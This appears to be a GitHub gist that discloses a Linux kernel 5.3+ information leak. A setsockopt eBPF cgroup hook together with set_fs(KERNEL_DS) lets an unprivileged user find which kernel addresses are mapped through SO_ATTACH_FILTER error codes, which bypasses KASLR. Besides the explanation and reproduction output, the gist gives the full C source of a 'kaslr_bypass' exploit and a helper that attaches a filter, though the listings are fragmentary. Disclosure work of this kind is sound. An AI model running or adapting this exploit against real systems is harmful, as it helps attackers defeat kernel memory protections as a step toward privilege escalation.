Skip to content

Instantly share code, notes, and snippets.


Ga-ryo/ Secret

Created Feb 12, 2021
What would you like to do?
Linux Kernel setsockopt System Call Untrusted Pointer Dereference Information Disclosure Vulnerability


From linux kernel 5.3, user who has CAP_NET_ADMIN capability can attach ebpf filter to setsockopt() syscall by using BPF_CGROUP_SETSOCKOPT type.

This feature hooks setsockopt() syscall if the socket is under certain cgroup(root cgroup is okay).

If any filter is attached to cgroup, attacker can check kernel address is mapped or not ( and use it to bypass KASLR ).


  1. Linux kernel version is 5.3 or higher.

  2. User who has CAP_NET_ADMIN attach ebpf filter to setsockopt() syscall. ( any filter is okay, but attacker should be able to pass the attached filter. )

  3. Attacker already have unprivileged shell.


Attacker is able to know what kernel addresses(pages) are actually mapped.

So it can be used to bypass KASLR.


In the setsockopt() syscall, BPF_CGROUP_RUN_PROG_SETSOCKOPT() function checks if setsockopt filter is attached or not. ( cgroup_bpf_enabled flag is incremented when privileged user attaches ebpf filter. )

If it's attached, pass arguments to the attached ebpf filter, and check if return value is not 0. ( CAP_NET_ADMIN user can flexibly restrict setsockopt() syscall parameter. )

Before running ebpf filter, kernel actually save arguments to kernel memory, because user can change actual value at any time. ( even after passing the filter. )

If the arguments are saved in kernel memory, copy_from_user() won't work. Because it's not userland address already.

To avoid this, kernel call set_fs(KERNEL_DS) and temporarily expand userland address range. (This hack is sometimes used to call syscall in kernel land.)

It's basically okay, because optval is definitely kernel memory pointer.

But if *optval also has any pointer ( which is expected to be in userland ) in its structure, it's abusable.

Because if an attacker set malicious kernel pointer as pointer in the structure, copy_from_user() works correctly because of set_fs(KERNEL_DS).

The optval of SO_ATTACH_FILTER has such pointer.

Below code copy optval to fprog.

But fprog has pointer.

If attacker set kernel pointer as filter member, the kernel will load filter from the kernel pointer and validate if it's valid BPF filter. ( load filter ) ( check filter )

If the kernel pointer is invalid, the kernel will return EFAULT.

If the kernel pointer is valid, the validation will basically fail because it's not a valid bpf filter.

Then kernel will return EINVAL.

So an attacker now be able to know which address is valid(return EINVAL) or invalid(return EFAULT)

Steps to reproduce

  1. Check kernel version. ( Exploit works with kernel upgraded/rebooted Ubuntu 18.04 )
garyo@garyo:~$ apt list "linux-image*" --installed | grep -v dbg
WARNING: apt does not have a stable CLI interface. Use with caution in scripts.
linux-image-5.3.0-53-generic/bionic-updates,bionic-security,now 5.3.0-53.47~18.04.1 amd64 [installed]
  1. Set filter to root cgroup. ( to meet precondition ) ↓This filter always return 1.
garyo@garyo:~$ sudo ./set_meaningless_filter /sys/fs/cgroup/unified/
Output from kernel verifier:
0: (b7) r0 = 1
1: (95) exit
processed 2 insns (limit 1000000) max_states_per_insn 0 total_states 0 peak_states 0 mark_read 0
  1. Run exploit _text is 0xffffffff9d200000 and exploit shows from there's valid kernel address from 0xffffffff9d200000. ( It will take some minutes, if you want to check quickly, change interval from 0x100000 to bigger number. )
garyo@garyo:~$ ./kaslr_bypass 0xffff000000000000 0xffffffffffff0000 0x100000
 Checking addr from 0xffff000000000000 to 0xffffffffffff0000 by 0x100000bytes
 0xffff000000000000 : INvalid
 0xffff95e940000000 : valid
 0xffff95e9c0000000 : INvalid
 0xffffb00a80000000 : valid
 0xffffb00a80600000 : INvalid
 0xffffb00a80700000 : valid
 0xffffb00a80800000 : INvalid
 0xffffb00a88000000 : valid
 0xffffb00a90000000 : INvalid
 0xffffd00a7be00000 : valid
 0xffffd00a7fe00000 : INvalid
 0xffffe88b00000000 : valid
 0xffffe88b02000000 : INvalid
 0xfffffe0000000000 : valid
 0xfffffe0000600000 : INvalid
 0xfffffe0000700000 : valid
 0xfffffe0000800000 : INvalid
 0xfffffe0000900000 : valid
 0xfffffe0000a00000 : INvalid
 0xfffffe0000d00000 : valid
 0xfffffe0000e00000 : INvalid
 0xfffffe0000f00000 : valid
 0xfffffe0001000000 : INvalid
 0xfffffe0001100000 : valid
 0xfffffe0001200000 : INvalid
 0xfffffe0001300000 : valid
 0xfffffe0001400000 : INvalid
 0xffffffff9d200000 : valid
 0xffffffff9e100000 : INvalid
 0xffffffff9e200000 : valid
 0xffffffff9e700000 : INvalid
 0xffffffff9e800000 : valid
 0xffffffff9eb00000 : INvalid
 0xffffffff9ee00000 : valid
 0xffffffff9f400000 : INvalid
 0xffffffffc0400000 : valid
 0xffffffffc0900000 : INvalid
 garyo@garyo:~$ sudo cat /proc/kallsyms | grep "T _text"
 ffffffff9d200000 T _text
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <arpa/inet.h>
#include <linux/if_ether.h>
#include <linux/filter.h>
#include <linux/kernel.h>
#include <netpacket/packet.h>
#include <net/if.h>
int sockets[2];
struct sock_fprog bpf = {
.len = 100,
.filter = (struct sock_filter *)(0xffff888000000000),
//.filter = code,
int main(int argc, char *argv[]){
int soc;
struct ifreq ifr;
struct sockaddr_ll sll;
unsigned char buf[4096];
memset(&ifr, 0, sizeof(ifr));
memset(&sll, 0, sizeof(sll));
if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
printf("failed to create socket pair '%s'\n", strerror(errno));
unsigned long start_addr, end_addr, interval;
bpf.filter = strtoul(argv[1], NULL, 0);
printf("filter address is set to %p\n", (void *)bpf.filter);
start_addr = strtoul(argv[1], NULL, 0);
end_addr = strtoul(argv[2], NULL, 0);
interval = strtoul(argv[3], NULL, 0);
printf("Checking addr from %p to %p by %pbytes\n", (void *)start_addr, (void *)end_addr, (void *)interval);
puts("Usage: kaslr_bypass start_addr end_addr interval");
unsigned long cur_addr;
int prev_status;
prev_status = -1;
for(cur_addr=start_addr; cur_addr<=end_addr; cur_addr+=interval){
bpf.filter = (struct sock_filter *)cur_addr;
if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_FILTER, &bpf, sizeof(bpf)) < 0) {
//printf("setsockopt '%s'\n", strerror(errno));
if(errno == EINVAL){
if(prev_status != 1){
printf("%p : valid\n", (void *)cur_addr);
prev_status = 1;//set valid
}else if(errno == EFAULT){
if(prev_status != 0){
printf("%p : INvalid\n", (void *)cur_addr);
prev_status = 0;//set invalid
puts("Somethign went wrong");
if(cur_addr>(cur_addr + interval)){
//integer oveflow
return 0;
/* eBPF example program:
* - Creates arraymap in kernel with 4 bytes keys and 8 byte values
* - Loads eBPF program
* The eBPF program accesses the map passed in to store two pieces of
* information. The number of invocations of the program, which maps
* to the number of packets received, is stored to key 0. Key 1 is
* incremented on each iteration by the number of bytes stored in
* the skb.
* - Attaches the new program to a cgroup using BPF_PROG_ATTACH
* - Every second, reads map[0] and map[1] to see how many bytes and
* packets were seen on any socket of tasks in the given cgroup.
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/unistd.h>
#include "linux/bpf.h"
#include "bpf/bpf.h"
#include "bpf_insn.h"
enum {
char bpf_log_buf[BPF_LOG_BUF_SIZE];
static __u64 ptr_to_u64(void *ptr)
return (__u64) (unsigned long) ptr;
int bpf_prog_load_pwn(enum bpf_prog_type prog_type,
const struct bpf_insn *insns, int prog_len,
const char *license, int kern_version, int expected_attach_type)
union bpf_attr attr = {
.prog_type = prog_type,
.insns = ptr_to_u64((void *) insns),
.insn_cnt = prog_len / sizeof(struct bpf_insn),
.license = ptr_to_u64((void *) license),
.log_buf = ptr_to_u64(bpf_log_buf),
.log_size = BPF_LOG_BUF_SIZE,
.log_level = 1,
.expected_attach_type = expected_attach_type,
attr.kern_version = kern_version;
bpf_log_buf[0] = 0;
return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
static int prog_load(int map_fd, int verdict)
struct bpf_insn prog2[] = {
BPF_MOV64_IMM(BPF_REG_0, 1), /* r0 = verdict */
size_t insns_cnt2 = sizeof(prog2) / sizeof(struct bpf_insn);
return bpf_load_program(BPF_PROG_TYPE_CGROUP_SKB,
prog, insns_cnt, "GPL", 0,
bpf_log_buf, BPF_LOG_BUF_SIZE);
return bpf_prog_load_pwn(BPF_PROG_TYPE_CGROUP_SOCKOPT, prog2 , sizeof(prog2), "GPL", 0, BPF_CGROUP_SETSOCKOPT);
static int usage(const char *argv0)
printf("Usage: %s [-d] [-D] <cg-path> \n", argv0);
printf(" -d Drop Traffic\n");
printf(" -D Detach filter, and exit\n");
static int attach_filter(int cg_fd, int type, int verdict)
int prog_fd, map_fd, ret, key;
long long pkt_cnt, byte_cnt;
map_fd = bpf_create_map(BPF_MAP_TYPE_ARRAY,
sizeof(key), sizeof(byte_cnt),
256, 0);
if (map_fd < 0) {
printf("Failed to create map: '%s'\n", strerror(errno));
prog_fd = prog_load(map_fd, verdict);
printf("Output from kernel verifier:\n%s\n-------\n", bpf_log_buf);
if (prog_fd < 0) {
printf("Failed to load prog: '%s'\n", strerror(errno));
ret = bpf_prog_attach(prog_fd, cg_fd, type, 0);
if (ret < 0) {
printf("Failed to attach prog to cgroup: '%s'\n",
int main(int argc, char **argv)
int detach_only = 0, verdict = 1;
enum bpf_attach_type type;
int opt, cg_fd, ret;
while ((opt = getopt(argc, argv, "Dd")) != -1) {
switch (opt) {
case 'd':
verdict = 0;
case 'D':
detach_only = 1;
return usage(argv[0]);
if (argc - optind < 1)
return usage(argv[0]);
cg_fd = open(argv[optind], O_DIRECTORY | O_RDONLY);
if (cg_fd < 0) {
printf("Failed to open cgroup path: '%s'\n", strerror(errno));
if (detach_only) {
ret = bpf_prog_detach(cg_fd, type);
printf("bpf_prog_detach() returned '%s' (%d)\n",
strerror(errno), errno);
} else
ret = attach_filter(cg_fd, type, verdict);
return ret;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment